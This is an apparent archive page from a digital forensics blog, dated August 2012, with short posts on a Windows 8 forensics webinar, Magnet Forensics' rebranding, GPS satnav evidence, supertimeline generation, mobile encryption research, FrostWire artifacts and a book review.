Sincere apologies to anyone having difficulty connecting to the
Meetingburner service to view the Windows 8 Forensics presentation -
please try the following URL on YouTube instead:
http://youtu.be/uhCooEz9FQs
Josh is available in the webinars forum to answer any questions. Please go here if you would like to join in the discussion.
Additionally, a PDF with slides from the presentation can be downloaded here.
I will get these gremlins out of the system soon, I promise!
Jamie
Wednesday, August 29, 2012
Tuesday, August 28, 2012
JADsoftware - The Company Behind IEF - Re-Launches As Magnet Forensics Inc.
JADsoftware, the company behind the industry-leading digital forensics
product Internet Evidence Finder (IEF), announced on Monday that they
have re-launched the company under a new name - Magnet Forensics Inc.
“A lot has changed since I launched JADsoftware and first developed IEF while working as a police officer and forensic examiner,” said Jad Saliba, Founder and Chief Technology officer of Magnet Forensics.
“After a couple years juggling both jobs, I realized that IEF had tremendous potential to help forensics professionals perform better investigations, so I decided to dedicate myself to developing the software full-time,” Saliba explained. “We now have a team of talented individuals who are working around the clock to take IEF to the next level. The time felt right to transition to a name that better reflects what we do, which is help our customers get to key Internet evidence as quickly and easily as possible, among a proliferation of online data.”
Read more
“A lot has changed since I launched JADsoftware and first developed IEF while working as a police officer and forensic examiner,” said Jad Saliba, Founder and Chief Technology officer of Magnet Forensics.
“After a couple years juggling both jobs, I realized that IEF had tremendous potential to help forensics professionals perform better investigations, so I decided to dedicate myself to developing the software full-time,” Saliba explained. “We now have a team of talented individuals who are working around the clock to take IEF to the next level. The time felt right to transition to a name that better reflects what we do, which is help our customers get to key Internet evidence as quickly and easily as possible, among a proliferation of online data.”
Read more
Monday, August 27, 2012
Computer Analysts and Experts – Making the Most of GPS Evidence
by Professor David Last
The many companies that sell software for computer forensics have developed products for analysing satellite navigators. Police high tech crime units and independent laboratories now use this software on an industrial scale. Computer technicians conduct the analyses. This is home territory for them, since the biggest component of a vehicle satellite navigator is a computer, often running the Linux operating system, and with access via a USB connection or an SD card. The analysis software extracts addresses which it plots using tools such as Google Maps. Specialists extract similar data from satnavs built into vehicles.
But many investigating officers find the results disappointing: “it’s just a list of addresses!” Unlike CCTV, ANPR and witness evidence, there are rarely times or dates to fit into a chronology. And anyway, the addresses are simply destinations for planning routes. The defence will point out that no-one can say who entered them, or at what time on what date, or whether a route was planned to them, or whether the satnav ever went there, let alone in a specific vehicle driven by a their client!
Another problem is that the investigating officer may simply not be able to understand the data provided. What are all these addresses? Were they recorded by the device itself or input by a user? Was that inputting an intentional action? The sense of frustration is enhanced by the quality of reports generated by much commercial software. The best packages provide at least some explanation of the data they contain, the worst none at all. The technicians who conduct the analyses often have neither the time nor the training to help. This leaves the officer with the prospect of presenting and defending poorly understood data in court. Some just give up!
But the addresses may at least have intelligence value...
Read more
The many companies that sell software for computer forensics have developed products for analysing satellite navigators. Police high tech crime units and independent laboratories now use this software on an industrial scale. Computer technicians conduct the analyses. This is home territory for them, since the biggest component of a vehicle satellite navigator is a computer, often running the Linux operating system, and with access via a USB connection or an SD card. The analysis software extracts addresses which it plots using tools such as Google Maps. Specialists extract similar data from satnavs built into vehicles.
But many investigating officers find the results disappointing: “it’s just a list of addresses!” Unlike CCTV, ANPR and witness evidence, there are rarely times or dates to fit into a chronology. And anyway, the addresses are simply destinations for planning routes. The defence will point out that no-one can say who entered them, or at what time on what date, or whether a route was planned to them, or whether the satnav ever went there, let alone in a specific vehicle driven by a their client!
Another problem is that the investigating officer may simply not be able to understand the data provided. What are all these addresses? Were they recorded by the device itself or input by a user? Was that inputting an intentional action? The sense of frustration is enhanced by the quality of reports generated by much commercial software. The best packages provide at least some explanation of the data they contain, the worst none at all. The technicians who conduct the analyses often have neither the time nor the training to help. This leaves the officer with the prospect of presenting and defending poorly understood data in court. Some just give up!
But the addresses may at least have intelligence value...
Read more
Friday, August 24, 2012
Generating computer forensic supertimelines under Linux: A comprehensive guide for Windows-based disk images
When the authors first published this paper, their intentions were to
develop a comprehensive guide to digital forensic timelines in order to
consolidate the many fragmented sources of information concerning this
topic. What they discovered, however, was that quality references were
often challenging to find among various books, papers, periodicals,
filesystem specifications and source code.
While conducting their research, they found that practical tool-based solutions existed for generating digital forensic timelines, though they each had specific limitations. Thus, efforts were undertaken by the authors to provide an alternative timeline generation framework. Although some in the community had already proposed the use and generation of supertimelines, all too often important data sources were being left out. In order to rectify this, it became necessary to couple additional tools in order to provide maximum evidentiary extraction...
Read more
While conducting their research, they found that practical tool-based solutions existed for generating digital forensic timelines, though they each had specific limitations. Thus, efforts were undertaken by the authors to provide an alternative timeline generation framework. Although some in the community had already proposed the use and generation of supertimelines, all too often important data sources were being left out. In order to rectify this, it became necessary to couple additional tools in order to provide maximum evidentiary extraction...
Read more
Wednesday, August 22, 2012
Webinar: Windows 8 Forensics - A First Look
Take a first look at Windows 8 forensics in a webinar presented by Josh
Brunty, Assistant Professor of Digital Forensics at Marshall University.
Learn about the changes in Windows 8 which forensic examiners should be
aware of before this new OS is released to the public in October. After
the webinar Josh will be available in the Forensic Focus forums to
answer any questions.
Date: Wednesday, August 29 2012
Time: 11AM EDT US / 4PM BST UK / 15:00 GMT
Duration: 35 mins
Register today at http://forensicfocus.enterthemeeting.com/m/JXI8IWVX
Please share this invitation with any friends or colleagues who might also be interested, thank you.
Date: Wednesday, August 29 2012
Time: 11AM EDT US / 4PM BST UK / 15:00 GMT
Duration: 35 mins
Register today at http://forensicfocus.enterthemeeting.com/m/JXI8IWVX
Please share this invitation with any friends or colleagues who might also be interested, thank you.
Friday, August 17, 2012
Apple phones are AES-tough, says forensics expert
Monday's Technology Review
carries a glowing tribute to Apple iPhone security according to its
author, Simson Garfinkel, a contributing editor who works in computer
forensics and is highly regarded as a leader in digital forensics. He
says Apple has passed a threshold “Today the Apple iPhone 4S and iPad 3
are trustworthy mobile computing systems that can be used for mobile
payments, e-commerce, and the delivery of high-quality paid
programming,” thanks to Apple’s heavy investment in iPhone security.
That is where “threshold” comes in. Apple has crossed it. Even law
enforcement cannot perform forensic examinations of Apple devices seized
from criminals, he said...
Read more (Phys.org)
Read more (Phys.org)
Thursday, August 16, 2012
Researchers Show How to Crack Android Encryption
As forensic examiners, some of the last things we want to hear are
"encryption" and "enabled" in the same sentence, however that's what has
been happening with the current line of Android devices. Starting with
Android 3.0, devices have been shipping with the ability for the user to
enable full device encryption. Fortunately for the forensic community,
there are individuals steadfast to find a way to break that encryption -
and have already proven how to do so. Two such researchers - Thomas
Cannon and Seyton Bradford - have demonstrated successful brute force
attacks against Android encryption. Thomas detailed their findings at
DEF CON 2012 in his presentation "Into the Droid - Gaining Access to User Data"...
He discusses that the encryption uses standard Linux dm-crypt, incorporated in Android devices running version 3.0 and newer, and uses the same password to encrypt and decrypt data as is used to unlock or log in to the device. So while the encryption is generally considered strong, users default to using short or easy-to-type passwords and pins to protect their device and enable the encryption...
Read more
He discusses that the encryption uses standard Linux dm-crypt, incorporated in Android devices running version 3.0 and newer, and uses the same password to encrypt and decrypt data as is used to unlock or log in to the device. So while the encryption is generally considered strong, users default to using short or easy-to-type passwords and pins to protect their device and enable the encryption...
Read more
Friday, August 10, 2012
Forensic Examination of FrostWire version 5
As digital forensic practitioners, we are faced regularly with users
utilizing the internet to swop and download copyrighted and contraband
material. Peer to peer (P2P) applications are commonly used for this
purpose, and like any software application, they are ever changing and
ever evolving. This paper will discuss how the P2P software application,
FrostWire v.5, functions and what artifacts can be found and examined
for forensic purposes. The software application mentioned is one of the
more popular P2P applications...
Read more
Read more
Wednesday, August 01, 2012
Book Review: Mastering Windows Network Forensics & Investigations
by Chad Tilbury
Mastering Windows Network Forensics and Investigations fills an interesting niche not well addressed in the pantheon of digital forensics resources. The material is well suited for beginning and intermediate forensic examiners looking to better understand network artifacts and go beyond single-system forensics. I highly recommend it for system administrators looking for a different perspective on network security or those interested in designing networks to be forensics-friendly. That said, the topics covered do not fit within the classical definition of network forensics. A more apt title might be Mastering Incident Response Forensics and Investigations.
This is the first book I have read in the Sybex Mastering series, and I was impressed with the writing, research, and editing. The authors blended dense material with relevant examples and insightful and engaging text boxes. Some of my favorite “side” topics were:
Read more
Mastering Windows Network Forensics and Investigations fills an interesting niche not well addressed in the pantheon of digital forensics resources. The material is well suited for beginning and intermediate forensic examiners looking to better understand network artifacts and go beyond single-system forensics. I highly recommend it for system administrators looking for a different perspective on network security or those interested in designing networks to be forensics-friendly. That said, the topics covered do not fit within the classical definition of network forensics. A more apt title might be Mastering Incident Response Forensics and Investigations.
This is the first book I have read in the Sybex Mastering series, and I was impressed with the writing, research, and editing. The authors blended dense material with relevant examples and insightful and engaging text boxes. Some of my favorite “side” topics were:
- “Cross-platform Forensic Artifacts”
- “Registry Research”, illustrating the use of Procmon for application footprinting
- “Time is of the Essence”, explaining fast forensics using event logs and the registry
Read more
Subscribe to:
Posts (Atom)